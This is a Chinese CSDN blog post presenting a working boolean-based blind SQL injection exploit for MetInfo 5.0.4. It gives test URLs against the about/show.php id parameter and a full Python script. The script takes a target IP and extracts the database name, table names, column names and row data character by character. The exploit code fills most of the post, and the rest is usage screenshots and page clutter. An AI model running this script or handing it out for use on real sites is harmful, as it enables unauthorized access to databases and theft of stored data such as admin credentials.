metinfo_5.0.4 布尔盲注 exp

已于 2023-11-08 13:49:26 修改
阅读量291 收藏
点赞数 10
分类专栏: # SQL注入 文章标签: 数据库 mysql web安全 网络安全 笔记
于 2023-11-08 13:44:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/134287648
版权

metinfo_5.0.4 布尔盲注脚本

网盘链接

提取码:dx2o

布尔盲注判断依据

成功请求

http://10.9.47.148/metinfo_5.0.4/about/show.php?lang=cn&id=22 and 1=1

image-20231108114457722

失败请求

http://10.9.47.148/metinfo_5.0.4/about/show.php?lang=cn&id=22 and 1=2

image-20231108114603908

盲注脚本使用

启动脚本

python metinfo_booleanBasedBlind.py

爆破数据库名、表名

输入目标 ip,自动爆破当前数据库名、当前数据库的表名(前提 metinfo 要在目标主机 www 根目录,直接 http://10.9.47.148/metinfo_5.0.4 可以访问 metinfo 网页)

image-20231108115700356

爆破表中字段

输入要爆破的表名

image-20231108120020203

爆破字段中数据

输入要爆破的字段

image-20231108132756901

解码

image-20231108132849553

源码

import string
import requests
import binascii
############################################################################################################
#                                                 定义字符集                                                 #
############################################################################################################
try:
    # 定义字符集
    strings = string.digits+string.ascii_letters+'_'
    str =  []
    for i in strings:
        str.append(i)
    ip=input("输入目标 ip:")
    ############################################################################################################
    #                                                 爆破数据库长度                                              #
    ############################################################################################################
    database_length=0
    for i in range(1,30):
        url = f"http://{ip}/metinfo_5.0.4/about/show.php?lang=cn&id=22 and length(database())={i}"
        res = requests.get(url=url)
        if res.status_code == 200:
            database_length=i
            break
    print(f"数据库名长度为{i}位")
    database_length=i
    print("***************************************************************************************************")
    ############################################################################################################
    #                                                 爆破数据库名                                               #
    ############################################################################################################
    database_name=""
    print("当前数据库:")
    for i in range(1,database_length+1):
        # 每位遍历字母数字下划线
        for j in str:
            # 进行 ascii 转码
            url = f"http://{ip}/metinfo_5.0.4/about/show.php?lang=cn&id=22 and ascii(substr(database(),{i},1))={ord(j)}"
            res = requests.get(url=url)
            if res.status_code == 200:
                print(j,end="")
                break
    print()
    print("***************************************************************************************************")
    #############################################################################################################
    #                                                 爆破表名                                                   #
    ############################################################################################################
    print("爆破表名")
    for i in range(0,600):
        # flag 用于避免爆破完每张表的继续进行多余爆破
        flag=0
        # end 用于避免爆破完表继续进行多余爆破
        end=0
        print(f"[{i+1}]", end="")
        # 假设每个表的表名最长30位,每个表名按位查询
        for j in range(1,30):
            for name_str in str:
                url = f"http://{ip}/metinfo_5.0.4/about/show.php?lang=cn&id=22 and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit {i},1),{j},1))={ord(name_str)}"
                res = requests.get(url=url)
                if res.status_code == 200:
                    print(name_str,end="")
                    # 该表名非空(未达到最大表数量)
                    end=1
                    break
                elif name_str=='_':
                    flag=1
                    break
            # 跳出超过表长,跳出循环
            if flag==1:
                break
        # 爆破的数据表超过最大数量,跳出循环
        if end==0:
            break
        print()
    #############################################################################################################
    #                                                 爆破字段名                                                 #
    ############################################################################################################
    print("***************************************************************************************************")
    table_name=input("输入要爆破的表名:")
    table=table_name
    table_name="0x"+binascii.hexlify(table_name.encode()).decode()
    # 跑第0-100个字段
    for i in range(0,100):
        print([i+1],end="")
        end=0
        # 假设每个表的字段名最长30位,每个字段名按位查询
        for j in range(1,30):
            flag = 0
            for name_str in str:
                url = f"http://{ip}/metinfo_5.0.4/about/show.php?lang=cn&id=22 and ascii(substr((select column_name from information_schema.columns where table_schema = database() and table_name={table_name} limit {i},1),{j},1))={ord(name_str)}"
                res = requests.get(url=url)
                if res.status_code == 200:
                    end=1
                    flag=1
                    print(name_str,end="")
                    break
            # 超过该字段长度,跳出循环,开始爆破下个字段
            if flag==0:
                break
        print()
        if end==0:
            break

    #############################################################################################################
    #                                                 爆破字段数据                                                #
    ############################################################################################################
    print("***************************************************************************************************")
    column=input("输入要爆破的字段:")
    # 跑第0-100个用户名
    for i in range(0,100):
        end=0
        # 假设每个用户的表名最长100位,每个用户名按位查询
        for j in range(1,100):
            flag=0
            for name_str in str:
                url = f"http://{ip}/metinfo_5.0.4/about/show.php?lang=cn&id=22 and ascii(substr((select {column} from {table} limit {i},1),{j},1))={ord(name_str)}"
                res = requests.get(url=url)
                if res.status_code == 200:
                    end=1
                    flag=1
                    print(name_str,end="")
                    break
            if flag==0:
                break
        print()
        if end==0:
            break
except:
    pass
gjl_
关注
  • 10
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
metinfo_手机生成静态页面.zip
04-29
Metinfo手机生成静态页面详解》 在当前的互联网环境中,网页加载速度和用户体验成为了衡量一个网站质量的重要标准。为了提升这些指标,许多网站管理员选择使用静态页面技术。Metinfo,作为一个功能强大的企业建站...
MetInfo_php源码_
09-30
MetInfo PHP website system is a collection of "computer mobile site WeChat public" triad of company system
MetInfo_V7.2.0短信接口插件demo.zip
11-02
MetInfo_V7.2.0短信接口插件:企业网站高效通信的得力助手》 MetInfo是一款广泛应用于企业建站的开源CMS系统,其最新版本V7.2.0引入了一项重要的功能增强——短信接口插件。这个插件的出现,使得企业网站在与用户...
MetInfo短信插件_MetInfo短信接口开发_MetInfo短信发送设置
01-07
MetInfo是一款功能强大的企业网站管理系统,它为企业提供了一站式的建站解决方案。在这个主题中,我们主要关注的是MetInfo的短信插件、短信接口开发以及短信发送设置的相关知识点。 一、MetInfo短信插件 MetInfo...
MetInfo 企业建站系统 v5.3.16
12-01
**MetInfo 企业建站系统 v5.3.16** MetInfo 是一款专为企业建站设计的内容管理系统(CMS),其v5.3.16版本具有诸多优势,深受新手和有一定PHP基础的开发者喜爱。该系统以轻量级、易用性著称,为快速搭建专业的企业...
华为云征文|Flexus云服务X实例应用,通过QT连接华为云MySQL,进行数据库的操作,数据表的增删改查
Arya的博客,专注后端领域
09-03 1099
4核12G-100G-3M规格的Flexus X实例使用测评第3弹:Flexus云服务X实例应用,通过QT连接华为云MySQL,进行数据库的操作,数据表的增删改查
【JavaWeb】JDBC&Druid&Tomcat入门使用
lklalmq的博客
09-04 1045
预编译SQL语句并执行:预防SQL注入问题获取 PreparedStatement 对象// SQL语句中的参数值,使用?占位符替代?// 通过Connection对象获取,并传入对应的sql语句设置参数值上面的sql语句中参数使用?进行占位,在之前之前肯定要设置 这些?的值。PreparedStatement对象:setXxx(参数1,参数2):给?赋 值Xxx:数据类型;如 setInt (参数1,参数2)参数:参数1:?的位置编号,从1 开始参数2:?的值执行SQL语句。
数据同步是如何实现的?为什么需要数据同步?
oOBubbleX的博客
09-05 849
实时数据同步,确保数据的一致性和实时更新性,将有利于企业各部门之间高效协作,从而支持企业的业务运作和决策。本文将介绍数据同步概念、数据同步的步骤、数据同步的方式,从而加深对数据同步的认识。
mongodb在Java中条件分组聚合查询并且分页(时间戳,按日期分组,年月日...)
简单发点工作中用到的,或者记录下小知识点
09-03 1623
按时间 年月日条件分组,筛选数据,统计数据,聚合查询 打印出mongo的SQL语句
如何防止常见的Web应用安全漏洞!
MJH827的博客
09-04 768
Web应用的广泛使用伴随着各种安全威胁。近年来,许多企业因忽视Web应用的安全性而遭受重大损失。本文将介绍几种常见的Web应用安全漏洞,并提供具体的防护方案和实战演练。
分布式事务
2301_80339238的博客
09-04 956
通过前面微服务保护中,我们知道当项目拆分到不同服务后,每个服务都有自己独立的数据库,独立的tomcat,所以事务的ACID的这种特性就没法满足了。例如下面我们订单服务调用了购物车服务和库存服务,如果调用库存服务出现失败,尽管可以通过抛出异常控制订单服务回滚,但是购物车服务不能感知到异常的。在分布式系统中,如果一个业务需要多个服务合作完成,并且每一个服务都有事务,多个事务必须同时成功或失败,这样的事务就是分布式事务。其中的每个服务的事务就是一个分支事务。整个业务称为全局事务。
jmeter之setUP、tearDown线程组
最新发布
回家吃月饼的学习交流地
09-07 175
jmeter之setUP、tearDown线程组的使用
nmt---Docker-compose自动化部署
qq_69920145的博客
09-03 1026
static-rr 权重, leastconn 最少连接, source 请求IP, 轮询 roundrobin。# 这⾥是容器中的IP地址,由于配置的是轮询roundrobin,weight 权重其实没有⽣效。# 这⾥是容器中的IP地址,由于配置的是轮询roundrobin,weight 权重其实没有⽣效。# 在 mysql 创建⼀个没有权限的haproxy⽤户,密码为空。# 在 mysql 创建⼀个没有权限的haproxy⽤户,密码为空。10. docker-compose移除容器。
【重学 MySQL】十四、显示表结构
CSDN全栈领域优秀博主,阿里云博客专家,工信部权威认证物联网技术开发工程师,曾30分钟高分通过C语言二级,两天手撸代码完成EasyX飞机大战,靠接软件私活一个月换苹果电脑
09-06 498
以上就是在MySQL中显示表结构的几种常用方法。DESCRIBE或DESC命令和命令提 供了快速查看表列信息的简便方式,而查询数据库则提供了更详细、更灵活的信息获取方式。命令则适用于需要查看或复制表完整结构的情况。
C++中的左值(Lvalue)和右值(Rvalue)详解
m0_52796585的博客
09-07 453
左值(Lvalue):指的是有持久存储的对象。它们的值可以被获取和修改,并且在表达式结束后依然存在。例如,普通的变量就是左值,因为它们占据了内存,并且可以被重新赋值。右值(Rvalue):通常指的是没有持久存储的对象。它们是表达式的临时结果,通常会在表达式结束后被销毁。例如,字面量(如整数常量42)和临时对象(如a + b的结果)就是右值,因为它们只在表达式求值期间存在。左值和右值是C++中非常重要的概念,理解它们对写出高效、现代的C++代码至关重要。左值表示持久存储,右值则表示临时结果。
计算机毕业设计选题推荐-任务管理系统-项目任务分配系统-Java/Python项目实战
IT研究室的博客
09-03 826
随着信息化技术的迅猛发展,各类企业和组织越来越依赖于高效的任务管理系统以保证其日常运营的顺利进行。根据IDC(国际数据公司)发布的报告显示,全球企业在数字化转型上的投入已达数千亿美元,其中相当一部分资金用于提升企业内部的管理效率。任务管理系统作为企业信息化的重要组成部分,能有效帮助企业分配、监控和反馈任务,从而提高工作效率。然而,尽管市场上已有多种任务管理系统,它们在功能、用户体验和适用性上存在显著差异。
向量数据库Faiss的搭建与使用
hello.reader
09-03 1329
在现代数据驱动的应用中,向量相似性搜索变得越来越重要,尤其是在推荐系统、图像搜索、自然语言处理等领域。Faiss(Facebook AI Similarity Search)作为一个强大的库,专门用于高效相似性搜索和稠密向量聚类,支持在大规模向量数据上进行快速搜索和处理。本文将详细介绍Faiss的搭建与使用,帮助您快速上手这一工具。
informix
weixin_44035362的博客
09-05 211
数据库很抽象,没有什么现代方法,推荐不要用。group_by不支持text,从设计上不建议使用text作为字段属性。代表日期格式从年到秒。
数据访问:JPA
hhgh_的博客
09-02 1025
其二,Sun希望整合ORM 技术,实现统一的 API调用接口。@Table(name=“”,catalog=“”,schema=“”)可选,用来标注一个数据库对应的实体类,数据库中创建的表明默认和类名一致,通常和@Entity配合使用,只能标注在实体的class定义处,表示实体对应的数据库表的信息。@Entity(name=“EntityName”)必须,用来标注一个数据库表对应的实体,数据库中创建的表明默认和类名一致,其中,name可选,对应数据库中的一个表,使用此注解标记Pojo是一个JPA实体。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值